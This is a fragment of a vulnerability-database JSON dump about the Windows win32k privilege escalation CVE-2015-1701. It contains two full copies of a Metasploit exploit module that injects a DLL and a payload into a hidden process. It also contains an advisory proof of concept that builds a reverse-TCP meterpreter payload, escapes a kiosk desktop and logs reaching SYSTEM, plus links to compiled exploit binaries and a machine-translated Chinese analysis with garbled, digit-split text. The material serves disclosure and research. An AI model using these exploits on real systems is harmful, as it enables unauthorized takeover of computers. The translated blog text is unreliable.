"2015-05-24T00:00:00", "published": "2015-05-24T00:00:00", "id": "MYHACK58:62201562817", "href": "http://www.myhack58.com/Article/html/3/62/2015/62817.htm", "type": "myhack58", "title": "Win32k elevation of privilege vulnerability, CVE-2 0 1 5-1 7 0 1-exp-vulnerability warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-12T18:25:58", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "edition": 1, "description": "Ticker 2 0 1 5 year 5 month 1 2 day, Microsoft pushed a 5-month patch day patch includes IE, Windows kernel, Windows kernel driver, Office and other components of the security updates. This month the repair of the two 0day vulnerabilities \nMS15-0 5 2 are fixed in the Windows kernel security feature bypass Vulnerability: CVE-2 0 1 5-1 6 7 4 out of https://technet.microsoft.com/en-us/library/security/MS15-052\uff09 \nMS15-0 5 1 fixed in the Windows kernel-mode drivers elevation of Privilege vulnerabilities: CVE-2 0 1 5-1 7 0 1 at https://technet.microsoft.com/en-us/library/security/MS15-051 also attracted our attention. After confirming, the CVE-2 0 1 5-1 6 7 4 I 2 0 1 4 years found a kernel-KASLR bypass Vulnerability, CVE-2 0 1 5-1 7 0 1 It is Fireeye in this year 4 month 1 8 day release on Operation RussianDoll Russian matryoshka operations, the report found, the Russian APT28 hacker group launched for the extremely particular target of attack for privilege escalation kernel 0day vulnerabilities, in Microsoft released a patch on the line at the same time, from the Russian security community kernelmode. info hack hfiref0x also in his Github announced for the CVE-2 0 1 5-1 7 0 1 vulnerability of the complete attack code https://github.com/hfiref0x/CVE-2015-1701 in. The Blog author on this three month repair of the 0day vulnerability, talk about their principles, details and repair methods and some of the surrounding information. \n0x01 CVE-2 0 1 5-1 6 7 4/MS15-0 5 2 \nVulnerability information \nMS15-0 5 2 Microsoft designed to fix CVE-2 0 1 5-1 6 7 4 vulnerabilities released for CNG. sys security updates. The vulnerability is real and the author in the last 1 0 months Microsoft released Windows 1 0 the first preview Edition 9 8 6 0 when released an article this http://weibo.com/1648808737/BpGpHhEyD on the description of the vulnerability, CVE-2 0 1 5-0 0 1 0/MS05-0 1 0, the https://technet.microsoft.com/library/security/MS15-010 is the same issue belongs to the Microsoft in fix for CVE-2 0 1 5-0 0 1 0 did not fix completely, the legacy of security vulnerabilities. \nIn Windows 1 0 after the release, the author on which to test the two KASLR bypass vulnerabilities, A is j00ru at NoSuchCon 2 0 1 3 published on the use of a kernel KiTrap01 handling the Debug exception the problem of detection of the kernel address to bypass KASLR issues http://j00ru.vexillium.org/blog/21_05_13/nsc2013_slides.pdf another one is the author of in 2 0 1 4 in reverse Windows 8.1 kernel find a CNG. sys in the presence of not yet disclosed KASLR bypass vulnerability, at the time the release of Windows 9 8 6 0 preview Edition, these two loopholes have not been fixed. \nDue to CNG. sys device(\\Device\\CNG)is one of the few settings of ALL APPLICATION PACKAGES DACL, thereby allowing a high degree of isolation, the AppContainer also can feel free to access the device, and this problem affects both x86 and x64 systems j00ru the KASLR bypass can only be used for x86 systems, and therefore the latter is more practical. This vulnerability is 360Vulcan Team to Pwn2Own type of the game reserves of the kernel vulnerability/defect one, and Microsoft for KASLR bypasses the type of vulnerability has been relatively ambiguous attitude j00ru the KASLR bypass the until now Windows 1 0 latest version 1 0 0 7 4 still has not been fixed, so the author will not be this vulnerability is reported to Microsoft, this patch of Japan, the CVE-2 0 1 5-1 6 7 4 that is, the author here mentioned the vulnerability. \nMay be due to the vulnerability affects IE and Spartan in the EPM\uff08enhanced protected mode, mainly using the AppContainer protection), Microsoft decided in Windows 1 0. new version to fix this vulnerability, we see that in 2 0 1 5 \u5e74 1 \u6708 released Windows 1 0 9 9 2 6, Microsoft has quietly completely fixes this vulnerability, while in 2 month's patch day, Microsoft also is similarly affected Windows 8/8. 1/Server 2 0 1 2/Server 2 0 1 2 R2 push the MS05-0 1 0 to try to fix this problem. \nBut it is interesting that, in the MS05-0 1 0, although Microsoft has given the vulnerability CVE-2 0 1 5-0 0 1 0 The number, but did not completely fix this problem, cause this loophole in the final Pwn2Own 2 0 1 5 is from Korean players lokihardt use compromised Windows kernel. It is also because of Pwn2Own 2 0 1 5, Microsoft again released MS15-0 5 2 Security Update for the vulnerability is changed to a new number: CVE-2 0 1 5-1 6 7 4 in. Actually this\u201cnew\u201dvulnerability and CVE-2 0 1 5-0 0 1 0 is almost exactly the same problem, belonging to the CVE-2 0 1 5-0 0 1 0 did not completely fix the legacy problems, let a person incomprehensible is, in Windows 1 0 9 9 2 6, The CVE-2 0 1 5-0 0 1 0 and CVE-2 0 1 5-1 6 7 4 The problems are is a one-time fix, have to say Microsoft seems to be in development Windows 1 0 the process, the patch repair and management of the occurrence of the negligence and confusion, was sparked now the problem. \nIn the ZDI on the official website has disclosed this vulnerability to some of the details: http://www.zerodayinitiative.com/advisories/ZDI-15-189/, due to cng. sys the attack surface is not much, have the experience of security researchers based on this information can already be relatively easily discover the loopholes in the details, so here the author directly describes the vulnerability of the specific information. \nVulnerability details \nThis vulnerability exists in cng. sys device control processing code. CNG. SYS is Microsoft's next-generation kernel cryptography, drive it through the device control(DeviceControl and the function output provides a lot of cryptography-related interface, and a lot of the Windows kernel driver as he the device control processing in the mix at the same time open to other kernel drivers and user-mode program control functions. This is often a lot of kernel security vulnerabilities of the source, I'm on the ISC 2 0 1 4 On On 3 6 0 XP shield Armor 3. 0 kernel protection was mentioned one had been affecting the Windows System, still affect many important third-party drive control interface within the KASLR bypass, there is a similar problem. \nCNG. sys is special in that he created the device(\\Device\\CNG), will use ObSetSecurityObjectByPointer for the device set up a special Security Descriptor the security descriptor is to allow ALL APPLICATION PACKAGES permissions the user full control of the device. For Microsoft's AppContainer/EPM mechanism slightly have an understanding of the students may know, set the permissions of the device, even in IE or Spartan isolation protection mode of the rendering process, it is also possible to directly access the CNG so a set purpose also is to hope that all processes are able to access its associated interface, so in the drive of the IRP_MJ_CREATE process, it is directly allowing any access, do not do any checks, i.e. the CNG. SYS related interfaces, even if is IE/Spartan protected mode or enhanced protected mode protected process, it can be freely accessed. \nIn CNG. SYS device control code, a plurality of control codes is dedicated to an external drive to use, such as 0x39024,0x39040,0x39044,0x39048,0x39064, etc., these device control code for the caller returns including FIPSSHA, FIPS3Des, HMAC MD5, FIPS GenRandom ,SSL encryption and decryption and Key Management, BCrypto series interface and a series of in CNG internal implementation of the function interface address, by this way, the external drive can directly call these functions in the interface, The Associated cryptographic operations, without the need for their own implementation of these interfaces. \nThe problem here is that for these specialized outer kernel mode driver settings interface, and there is no check of the IRP whether the source is kernel-mode, so the user mode program directly via the DeviceIoControl function, as you can invoke these device control code, access to these functions of the interface. Of course, user mode programs can't directly use these interfaces, but with CNG. SYS mirror image of the layout, the user-mode program can get CNG. sys base address and the relevant key data of the position, thus completely bypassing Microsoft kernel KASLR kernel-mode address randomization techniques. \n\n\n**[1] [[2]](<62366_2.htm>) [[3]](<62366_3.htm>) [[4]](<62366_4.htm>) [next](<62366_2.htm>)**\n", "modified": "2015-05-13T00:00:00", "published": "2015-05-13T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2015/62366.htm", "id": "MYHACK58:62201562366", "type": "myhack58", "title": "About 1 5 years 5 months to repair the two 0day-vulnerability warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:08", "description": "", "published": "2015-06-22T00:00:00", "type": "packetstorm", "title": "Microsoft Windows ClientCopyImage Improper Object Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2015-06-22T00:00:00", "id": "PACKETSTORM:132403", "href": "https://packetstormsecurity.com/files/132403/Microsoft-Windows-ClientCopyImage-Improper-Object-Handling.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'msf/core/post/windows/reflective_dll_injection' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::ReflectiveDLLInjection \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'Windows ClientCopyImage Win32k Exploit', \n'Description' => %q{ \nThis module exploits improper object handling in the win32k.sys kernel mode driver. \nThis module has been tested on vulnerable builds of Windows 7 x64 and x86, and \nWindows 2008 R2 SP1 x64. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Unknown', # vulnerability discovery and exploit in the wild \n'hfirefox', # Code released on github \n'OJ Reeves' # msf module \n], \n'Arch' => [ ARCH_X86, ARCH_X86_64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n}, \n'Targets' => [ \n[ 'Windows x86', { 'Arch' => ARCH_X86 } ], \n[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] \n], \n'Payload' => { \n'Space' => 4096, \n'DisableNops' => true \n}, \n'References' => [ \n['CVE', '2015-1701'], \n['MSB', 'MS15-051'], \n['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'], \n['URL', 'https://github.com/hfiref0x/CVE-2015-1701'], \n['URL', 'https://technet.microsoft.com/library/security/MS15-051'] \n], \n'DisclosureDate' => 'May 12 2015', \n'DefaultTarget' => 0 \n})) \nend \n \ndef check \n# Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work) \n# Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works) \n# Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works) \n# Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works) \n \nif sysinfo['OS'] !~ /windows/i \nreturn Exploit::CheckCode::Unknown \nend \n \nif sysinfo['Architecture'] =~ /(wow|x)64/i \narch = ARCH_X86_64 \nelsif sysinfo['Architecture'] =~ /x86/i \narch = ARCH_X86 \nend \n \nfile_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys' \nmajor, minor, build, revision, branch = file_version(file_path) \nvprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\") \n \nreturn Exploit::CheckCode::Safe if build == 7601 \n \nreturn Exploit::CheckCode::Detected \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown \nfail_with(Failure::NotVulnerable, 'Exploit not available on this system.') \nend \n \nif sysinfo['Architecture'] =~ /wow64/i \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Reader Sandbox won't allow to create a new process: \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_status('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \n \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nif target.arch.first == ARCH_X86 \ndll_file_name = 'cve-2015-1701.x86.dll' \nelse \ndll_file_name = 'cve-2015-1701.x64.dll' \nend \n \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name) \nlibrary_path = ::File.expand_path(library_path) \n \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \npayload_mem = inject_into_process(process, payload.encoded) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \n \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132403/ms15_051_client_copy_image.rb.txt"}, {"lastseen": "2020-05-15T17:47:02", "description": "", "published": "2020-05-14T00:00:00", "type": "packetstorm", "title": "Cellebrite UFED 7.5.0.845 Desktop Escape / Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701", "CVE-2020-12798"], "modified": "2020-05-14T00:00:00", "id": "PACKETSTORM:157715", "href": "https://packetstormsecurity.com/files/157715/Cellebrite-UFED-7.5.0.845-Desktop-Escape-Privilege-Escalation.html", "sourceData": "`KL-001-2020-002 : Cellebrite Restricted Desktop Escape and Escalation of User Privilege \n \nTitle: Cellebrite Restricted Desktop Escape and Escalation of User Privilege \nAdvisory ID: KL-001-2020-002 \nPublication Date: 2020.05.14 \nPublication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-002.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Cellebrite \nAffected Product: UFED \nAffected Version: 5.0 - 7.5.0.845 \nPlatform: Embedded Windows \nCWE Classification: CWE-269: Improper Privilege Management, \nCWE-20: Input Validation Error \nCVE ID: CVE-2020-12798 \n \n \n2. Vulnerability Description \n \nCellebrite UFED device implements local operating system \npolicies that can be circumvented to obtain a command \nprompt. From there privilege escalation is possible using \npublic exploits. \n \n \n3. Technical Description \n \nThe Cellebrite UFED device implements local operating system \npolicies which are designed to limit access to operating system \nfunctionality. These include but may not be limited to: \n \n1. Preventing access to dialog such as Run, File Browser, \nand Explorer. \n \nand \n \n2. Preventing access to process and application management tools \nsuch as Task Manager and the Control Panel. \n \nThese policies can be circumvented by using functionality \nthat is permitted by the policy governing the use of the user \ndesktop. A user can leverage the Wireless Network connection \nstring to select certificate based authentication, which then \nenables file dialogs that are able to be used to launch a \ncommand prompt. Following this, privileges can be elevated \nusing off the shelf and publicly available exploits relevant \nto the specific Windows version in use. \n \n \n4. Mitigation and Remediation Recommendation \n \nThe vendor has informed KoreLogic that this vulnerability is \nnot present on devices manufactured \"at least since 2018.\" The \nvendor was uncertain of the exact version number that remediated \nthis attack vector. \n \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin (@thatguylevel) \nof KoreLogic, Inc. \n \n \n6. Disclosure Timeline \n \n2020.03.05 - KoreLogic submits vulnerability details to \nCellebrite. \n2020.03.17 - Cellebrite acknowledges receipt and the intention \nto investigate. \n2020.04.16 - KoreLogic requests an update on the status of the \nvulnerability report. \n2020.04.19 - Cellebrite responds, notifying KoreLogic that the \nvulnerable dialog is not available on newer UFED \nreleases. Indicates they will determine when the \nremediation was introduced. \n2020.05.04 - KoreLogic requests an update from Cellebrite. \n2020.05.05 - Cellebrite responds that they do not have the \nversion number at hand, but does not request \ndelaying public disclosure. \n2020.05.11 - MITRE issues CVE-2020-12798. \n2020.05.12 - 45 business-days have elapsed since the report was \nsubmitted to Cellebrite. \n2020.05.14 - KoreLogic public disclosure. \n \n \n7. Proof of Concept \n \nBegin by using the msfvenom binary to create a meterpreter \npayload that will initiate a remote connection to a C2. Copy \nthe payload to a USB drive. Following this, use the msfconsole \nbinary to create a C2 connection handler with the multi/handler \nfunctionality. \n \n$ msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=[REDACTED] LPORT=8888 \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload \n[-] No arch selected, selecting arch: x86 from the payload \nNo encoder or badchars specified, outputting raw payload \nPayload size: 341 bytes \nFinal size of exe file: 73802 bytes \nSaved as: payload.exe \n$ sudo mount -o rw /dev/sda1 a/ \n$ sudo cp payload.exe a/ \n$ sync \n$ sudo umount a/ \n$ msfconsole \n[snip] \nmsf5 exploit(multi/handler) > show options \n \nModule options (exploit/multi/handler): \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \n \n \nPayload options (windows/meterpreter/reverse_tcp): \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nEXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) \nLHOST [REDACTED] yes The listen address (an interface may be specified) \nLPORT 8888 yes The listen port \n \n \nExploit target: \n \nId Name \n-- ---- \n0 Wildcard Target \n \n \nmsf5 exploit(multi/handler) > exploit -j -z \n[*] Exploit running as background job 1. \n[*] Exploit completed, but no session was created. \n[*] Started reverse TCP handler on [REDACTED]:8888 \n \nNow insert the USB drive where payload.exe resides into a \ntarget Cellebrite device. Next, follow the steps below: \n \n1. Open the Wireless Network Connection screen by clicking \non the WiFi icon in the bottom right hand corner of the \nscreen. This should be next to the system clock. \n \n2. Select \"Change advanced settings\" -- this will bring up a \nscreen called Windows Network Connection Properties. Choose \nthe Wireless Networks tab. \n \n3. Under the Preferred networks section, click the Add button \nand then select the Authentication tab. Make sure \"Enable IEEE \n802.1x authentication for this network\" is enabled. \n \n4. Under EAP Type, select \"Smart Card or other Certificate\" \nand then click the Properties button. \n \n5. Under Trusted Root Certificate Authorities click the \nView Certificate button. This will bring up a screen called \nCertificate, choose the Details tab and click the \"Copy to \nFile\" button. This will bring up a screen called Certificate \nExport Wizard. \n \n6. Click Next and select any of the available export format \noptions. For example, choose the \"DER encoded binary X.509\" \noption and click next. \n \n7. Instead of typing out a export path click the Browse \nbutton to open a file dialog. In the \"File Name\" box type: \n\\WINDOWS\\System32\\ and under \"Save as type\" select the \"All \nFiles (*.*)\" option. Hit the enter key. \n \n8. Locate the cmd.exe file then drag and drop any DLL over \nit. For example, choose the clusapi.dll file located near the \ncmd.exe executable. This will open a Command Prompt screen as \nan unprivileged user. \n \n9. Type the drive letter to change into the USB drive containing \nthe payload.exe file. \n \nC:\\windows\\system32>D: \nD:\\>payload.exe \n \nThis results in a connection back into Metasploit. \n \n[*] Sending stage (180291 bytes) to [REDACTED] \n[*] Meterpreter session 2 opened ([REDACTED]:8888 -> [REDACTED]:1041) at 2020-01-29 11:41:05 -0800 \nmsf5 exploit(multi/handler) > sessions -i 2 \n[*] Starting interaction with 2... \nmeterpreter > getuid \nServer username: TOUCH-[REDACTED]\\Operator \n \nAn exploit for CVE-2015-1701 is loaded up and configured to run \na local privilege escalation exploit against the unprivileged \nsession and SYSTEM is obtained. \n \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > show options \n \nModule options (exploit/windows/local/ms15_051_client_copy_image): \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nSESSION yes The session to run this module on. \n \n \nExploit target: \n \nId Name \n-- ---- \n0 Windows x86 \n \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 2 \nSESSION => 2 \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > set PAYLOAD windows/meterpreter/reverse_tcp \nPAYLOAD => windows/meterpreter/reverse_tcp \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > set LPORT 8888 \nLPORT => 8888 \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST [REDACTED] \nLHOST => [REDACTED] \nmsf5 exploit(windows/local/ms15_051_client_copy_image) > run \n \n[*] Started reverse TCP handler on [REDACTED]:8888 \n[*] Launching notepad to host the exploit... \n[+] Process 3936 launched. \n[*] Reflectively injecting the exploit DLL into 3936... \n[*] Injecting exploit into 3936... \n[*] Exploit injected. Injecting payload into 3936... \n[*] Payload injected. Executing exploit... \n[*] Sending stage (180291 bytes) to [REDACTED] \n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete. \n[*] Meterpreter session 3 opened ([REDACTED]:8888 -> [REDACTED]:1045) at 2020-01-29 11:48:15 -0800 \n \nmeterpreter > getuid \nServer username: NT AUTHORITY\\SYSTEM \nmeterpreter > \n \n \n \nThe contents of this advisory are copyright(c) 2020 \nKoreLogic, Inc. and are licensed under a Creative Commons \nAttribution Share-Alike 4.0 (United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. is a founder-owned and operated company with a \nproven track record of providing security services to entities \nranging from Fortune 500 to small and mid-sized companies. We \nare a highly skilled team of senior security consultants doing \nby-hand security assessments for the most important networks in \nthe U.S. and around the world. We are also developers of various \ntools and resources aimed at helping the security community. \nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157715/KL-001-2020-002.txt"}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "edition": 2, "description": "**Name**| ms15_051 \n---|--- \n**CVE**| CVE-2015-1701 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| win32k.sys bServerSideWindowProc flag logic issue \n**Notes**| Repeatability: Infinite \nNotes: \nThis module exploits a vulnerability on the win32k.sys driver. \nThe bServerSideWindowProc flag on the window's handle structure is meant to be used to improve the performance of usercallbacks by replacing the call to a userland function with a kernel one. \nSetting this flag allows the window procedure to run on kernel mode. \nWhen creating a new window, after calling the ClientCopyImage usercallback, the kernel doesn't check the possibility that the bServerSideWindowProc could have been raised. And thus, execution continues as if the flag was unset. \nBy hooking ClientCopyImage it is possible to set the bServerSideWindowProc and define a new window procedure by calling the SetWindowLongPtr function on the newly created window. \nThis will lead to the executon of the defined window procedure on kernel mode. \n \nTested on: \nWindows XP SP3 x86 \nWindows 7 Professional x86 \nWindows 7 Professional SP1 x64 \nWindows Server 2003 Standard x64 \nWindows Server 2008 R2 Standard x64 SP1 \n \nThis exploit doesn't work on Windows 8.1 \n \nVENDOR: Microsoft \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701 \nCVE Name: CVE-2015-1701 \n\n", "modified": "2015-04-21T10:59:00", "published": "2015-04-21T10:59:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms15_051", "id": "MS15_051", "title": "Immunity Canvas: MS15_051", "type": "canvas", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-04T03:42:55", "edition": 2, "description": "This Metasploit module exploits improper object handling in the win32k.sys kernel mode driver. This Metasploit module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.", "published": "2015-06-23T00:00:00", "type": "zdt", "title": "Microsoft Windows ClientCopyImage Improper Object Handling Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2015-06-23T00:00:00", "id": "1337DAY-ID-23783", "href": "https://0day.today/exploit/description/23783", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows ClientCopyImage Win32k Exploit',\r\n 'Description' => %q{\r\n This module exploits improper object handling in the win32k.sys kernel mode driver.\r\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\r\n Windows 2008 R2 SP1 x64.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Unknown', # vulnerability discovery and exploit in the wild\r\n 'hfirefox', # Code released on github\r\n 'OJ Reeves' # msf module\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64 ],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' => [\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]\r\n ],\r\n 'Payload' => {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'References' => [\r\n ['CVE', '2015-1701'],\r\n ['MSB', 'MS15-051'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],\r\n ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],\r\n ['URL', 'https://technet.microsoft.com/library/security/MS15-051']\r\n ],\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def check\r\n # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)\r\n # Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works)\r\n # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)\r\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)\r\n\r\n if sysinfo['OS'] !~ /windows/i\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /(wow|x)64/i\r\n arch = ARCH_X86_64\r\n elsif sysinfo['Architecture'] =~ /x86/i\r\n arch = ARCH_X86\r\n end\r\n\r\n file_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys'\r\n major, minor, build, revision, branch = file_version(file_path)\r\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\r\n\r\n return Exploit::CheckCode::Safe if build == 7601\r\n\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n\r\n if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown\r\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /wow64/i\r\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\r\n elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\r\n elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64\r\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\r\n end\r\n\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Meterpreter::RequestError\r\n # Reader Sandbox won't allow to create a new process:\r\n # stdapi_sys_process_execute: Operation failed: Access is denied.\r\n print_status('Operation failed. Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n if target.arch.first == ARCH_X86\r\n dll_file_name = 'cve-2015-1701.x86.dll'\r\n else\r\n dll_file_name = 'cve-2015-1701.x64.dll'\r\n end\r\n\r\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23783"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Windows - Local Privilege Escalation (MS15-051)", "edition": 1, "published": "2015-05-18T00:00:00", "title": "Microsoft Windows - Local Privilege Escalation (MS15-051)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2015-05-18T00:00:00", "id": "EXPLOITPACK:0C7BFC055EDD13EA35CAEAEBD1DF65A3", "href": "", "sourceData": "# Source: https://github.com/hfiref0x/CVE-2015-1701\n\nWin32k LPE vulnerability used in APT attack\n\nOriginal info: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html\n\nCredits\nR136a1 / hfiref0x\n\n\n\n## Compiled EXE:\n### x86\n+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe\n+ Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-32.exe\n### x64 \n+ https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe\n+ Exploit-DB 